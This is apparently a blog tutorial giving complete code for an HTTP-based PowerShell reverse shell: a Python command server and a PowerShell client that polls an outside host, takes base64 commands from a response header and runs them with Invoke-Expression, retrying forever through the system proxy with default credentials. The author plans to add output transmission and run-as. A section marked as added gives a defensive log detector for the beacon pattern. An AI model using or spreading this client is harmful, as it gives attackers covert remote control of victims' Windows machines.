Creating a simple HTTP-based PowerShell reverse shell

Truth is, it's not that difficult. All you need are two components: a client and a server.

The server is a relatively simple bit of Python code that adds a special response header (base64 encoded) whose contents then get executed on the client side.

# Python 2 (BaseHTTPServer, raw_input and print statement)
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import base64

PORT_NUMBER = 8080

class myHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # every poll from the client is answered with a 200 ...
        self.send_response(200)
        # ... and a CMD header carrying the operator's next command, base64 encoded
        CMD = base64.b64encode(raw_input("CMD: >> "))
        self.send_header('CMD', CMD)
        self.end_headers()
        # harmless-looking body so the request looks like ordinary browsing
        self.wfile.write("<html><body>nothing to see here</body></html>")
        return

try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    server.serve_forever()
except KeyboardInterrupt:
    print '^C received, shutting down the web server'
    server.socket.close()

The client, on the other hand, just sits there, picks up the commands and executes them (it does not send any result back, so it's blind!). If it can't connect it will retry in a loop forever.

while (1 -eq 1) {
    try {
        $url = "http://x.x.x.x:8080/p"
        # handle proxies and use default creds if needed
        $req = [System.Net.HttpWebRequest]::Create($url);
        $p = [System.Net.WebRequest]::GetSystemWebProxy();
        $p.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
        $req.Proxy = $p
        # add our header
        $req.Headers.Add('CMD', 'INITIAL')
        $res = $req.GetResponse();
        # the command comes back in the CMD response header
        $x = $res.GetResponseHeader("CMD");
        # decode base64
        $d = [System.Convert]::FromBase64String($x);
        $Ds = [System.Text.Encoding]::UTF8.GetString($d);
        # exec whatever we gave it (can be PowerShell or just shell commands)
        Invoke-Expression $Ds;
        $res.Close();
    } catch {}
}
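From the defender's side, the channel above has a clear shape in proxy logs: one host polling the same URL over and over, a custom CMD request header, and a CMD response header that decodes as base64 text. The following is an added example (not part of the original post) that surfaces exactly that pattern; it assumes a hypothetical, constructed log format and includes constructed sample lines.

```python
import base64
import binascii
import re
from collections import defaultdict

# Assumed (hypothetical) proxy log format, one request per line:
#   <client> <method> <url> req_cmd=<request CMD hdr> resp_cmd=<response CMD hdr>
# with '-' meaning the header was absent on that request.
LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"req_cmd=(?P<req_cmd>\S+) resp_cmd=(?P<resp_cmd>\S+)$"
)

# Constructed sample lines: one host polling the same path with the CMD header,
# one ordinary request from another host, and one CMD value that is not base64.
SAMPLE_LOG = """\
10.0.0.5 GET http://203.0.113.10:8080/p req_cmd=INITIAL resp_cmd=d2hvYW1p
10.0.0.7 GET http://intranet.example/index.html req_cmd=- resp_cmd=-
10.0.0.5 GET http://203.0.113.10:8080/p req_cmd=INITIAL resp_cmd=aG9zdG5hbWU=
10.0.0.5 GET http://203.0.113.10:8080/p req_cmd=INITIAL resp_cmd=not*base64
"""


def decode_cmd(value):
    """Return the decoded text if value is valid base64 UTF-8, else None."""
    if value == "-":
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_beacons(log_text, min_hits=2):
    """Group requests carrying a CMD header by (client, url) and return the
    pairs seen at least min_hits times, with each response payload decoded."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue  # line does not fit the assumed format
        if m["req_cmd"] == "-" and m["resp_cmd"] == "-":
            continue  # no custom CMD header in either direction
        hits[(m["client"], m["url"])].append(decode_cmd(m["resp_cmd"]))
    return {key: cmds for key, cmds in hits.items() if len(cmds) >= min_hits}


if __name__ == "__main__":
    for (client, url), cmds in find_beacons(SAMPLE_LOG).items():
        print(client, "polls", url, "decoded CMD payloads:", cmds)
```

A payload that fails to decode is kept as None rather than dropped, since a beacon that suddenly starts sending non-base64 values is itself worth a look.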

I intended to improve it and add some features such as:
* SSL
* Output transmission
* Ability to 'run-as'
* Error handling
